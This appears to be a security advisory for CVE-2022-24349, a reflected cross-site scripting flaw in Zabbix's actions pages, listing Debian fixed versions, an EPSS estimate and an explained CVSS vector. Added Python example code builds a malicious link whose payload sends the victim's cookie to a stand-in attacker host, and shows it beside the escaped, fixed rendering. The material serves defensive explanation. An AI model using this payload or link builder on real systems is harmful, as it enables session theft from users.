CVE-2022-24349
zabbix - security update
Description
An authenticated user can craft a link to the actions pages of the Zabbix frontend that carries a reflected XSS payload and send it to other users. Because the injected script runs in the victim's browser within the frontend's origin, it has access to all the same objects as the rest of the web page and can make arbitrary modifications to the content displayed to the victim. Exploitation relies on social engineering and on several conditions holding at once: the attacker needs authorized access to the Zabbix frontend, a network path between a server under their control and the victim's computer, an understanding of the attacked infrastructure, and enough trust from the victim, delivered over a communication channel the victim trusts, for the link to be followed.
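As an added illustration of the attack pattern described above (example code written for this page, not Zabbix frontend code): an attacker-crafted link whose query parameter is reflected into an actions page unescaped, beside the escaped form of the same output. The script path `actions.php`, the parameter name `filter_name` and the host names are hypothetical placeholders; the advisory does not name the vulnerable parameter or page.

```python
# Added example, not Zabbix code. Page path, parameter name and hosts are
# hypothetical placeholders chosen for illustration.
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed attacker payload: the leading '">' closes the attribute the value
# lands in, then a script tag exfiltrates the victim's cookie.
PAYLOAD = '"><script>fetch("https://attacker.invalid/?c="+document.cookie)</script>'


def build_malicious_link(base="https://zabbix.example/actions.php"):
    """Attacker side: the link that gets sent to the victim (hypothetical URL)."""
    return base + "?" + urlencode({"filter_name": PAYLOAD})


def extract_param(url, name):
    """Server side: pull the parameter the page reflects out of the request URL."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(filter_name):
    """Reflected sink: raw interpolation into an HTML attribute."""
    return f'<input type="text" name="filter_name" value="{filter_name}">'


def render_fixed(filter_name):
    """Hardened sink: html.escape(quote=True) neutralises < > & " and '
    so the value stays inside the attribute as inert text."""
    safe = html.escape(filter_name, quote=True)
    return f'<input type="text" name="filter_name" value="{safe}">'


def script_tags(fragment):
    """Count live <script> openers in a rendered fragment."""
    return fragment.count("<script>")


if __name__ == "__main__":
    link = build_malicious_link()
    reflected = extract_param(link, "filter_name")
    print("vulnerable:", render_vulnerable(reflected))
    print("fixed:     ", render_fixed(reflected))
```

The vulnerable form contains one executable script tag; the fixed form contains none, and the payload is visible only as escaped text inside the attribute.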
How to fix CVE-2022-24349
To remediate CVE-2022-24349, upgrade the affected package to a fixed version below.
- Debian 11 (bullseye): upgrade to 1:5.0.44+dfsg-1+deb11u1 or later
- Debian 9 (stretch): upgrade to 1:3.0.32+dfsg-0+deb9u3 or later
Is CVE-2022-24349 being exploited?
Low. The EPSS score is 0.8%, a low estimated probability of exploitation in the wild over the next 30 days; EPSS is a predictive score rather than a record of observed attacks, so treat it as "no sign of exploitation at scale", not as proof that none has occurred.
Affected packages (2)
- zabbix (Debian 11): all versions before 1:5.0.44+dfsg-1+deb11u1
- zabbix (Debian 9): all versions before 1:3.0.32+dfsg-0+deb9u3
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM (4.4) | CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N |

The vector matches the description: reachable over the network (AV:N), high attack complexity (AC:H) because the social-engineering preconditions must all line up, low privileges required (PR:L, the attacker is an authenticated frontend user), user interaction required (UI:R, the victim must open the link), and changed scope (S:C) because the script executes in the victim's browser rather than in the vulnerable component itself.